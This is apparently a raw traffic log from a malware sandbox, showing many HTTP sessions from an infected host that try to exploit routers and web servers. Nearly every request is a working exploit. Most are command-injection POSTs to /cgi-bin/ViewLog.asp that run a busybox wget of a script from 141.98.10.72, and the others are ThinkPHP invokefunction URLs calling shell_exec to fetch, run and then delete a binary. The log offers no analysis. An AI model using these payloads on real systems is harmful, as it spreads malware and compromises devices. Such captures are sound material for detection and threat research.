                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        454192.168.2.145047094.120.111.178080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:55.171380043 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        455192.168.2.145227094.123.16.148080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:55.172729969 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        456192.168.2.144912688.28.210.7280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:55.235642910 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:55.555672884 CET62INHTTP/1.0 400 Bad Request
                                                        Connection: Keep-Alive
                                                        Feb 14, 2024 09:33:55.555689096 CET83INData Raw: 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e
                                                        Data Ascii: Keep-Alive: timeout=20Content-Type: text/html<h1>Bad Request</h1>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        457192.168.2.145605694.238.154.1488080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:55.368246078 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:55.975011110 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:57.190888882 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        458192.168.2.143411095.216.220.768080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:55.390876055 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:55.610764027 CET168INHTTP/1.1 404 Not Found
                                                        Server: imgproxy
                                                        X-Request-Id: EkVx5jSkRsuOYUpXUf6CF
                                                        Date: Wed, 14 Feb 2024 08:33:55 GMT
                                                        Content-Length: 0
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        459192.168.2.145067431.136.173.2228080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:55.392524004 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:56.071077108 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:57.414911985 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:00.294909954 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:05.670593023 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:16.422144890 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:39.205306053 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:22.211463928 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        460192.168.2.143622895.101.133.14880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:55.436872959 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:55.638441086 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Wed, 14 Feb 2024 08:33:55 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:55 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 34 38 35 36 35 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 36 33 35 26 23 34 36 3b 39 36 30 65 30 63 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;9485655f&#46;1707899635&#46;960e0cc</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        461192.168.2.143952895.101.215.8580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:55.454232931 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:55.673516989 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:33:55 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:55 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 65 66 32 36 34 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 36 33 35 26 23 34 36 3b 31 33 61 62 66 65 33 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;cef2645f&#46;1707899635&#46;13abfe34</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        462192.168.2.144604695.217.37.24780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:55.462182045 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:55.688585043 CET115INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close
                                                        Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                        Data Ascii: 400 Bad Request


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        463192.168.2.143288888.221.61.10380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:57.897569895 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:58.104851961 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Wed, 14 Feb 2024 08:33:57 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:57 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 35 38 66 31 34 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 36 33 37 26 23 34 36 3b 32 62 38 31 30 39 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;958f1402&#46;1707899637&#46;2b8109d</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        464192.168.2.145234688.251.125.6180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:57.954024076 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:58.218842030 CET89INHTTP/1.1 404 Not Found
                                                        Content-type: text/html
                                                        Content-Length: 0
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        465192.168.2.144632895.164.193.6280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:58.223578930 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:58.342606068 CET495INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:33:58 GMT
                                                        Server: Apache/2.4.52 (Ubuntu)
                                                        Content-Length: 301
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        466192.168.2.143901495.183.38.19580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:58.450269938 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:58.687422037 CET315INHTTP/1.1 400 Bad Request
                                                        Server: openresty
                                                        Date: Wed, 14 Feb 2024 08:33:58 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 154
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        467192.168.2.144429495.100.10.15280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:58.761461973 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:59.180108070 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:33:58 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:58 GMT
                                                        Connection: close
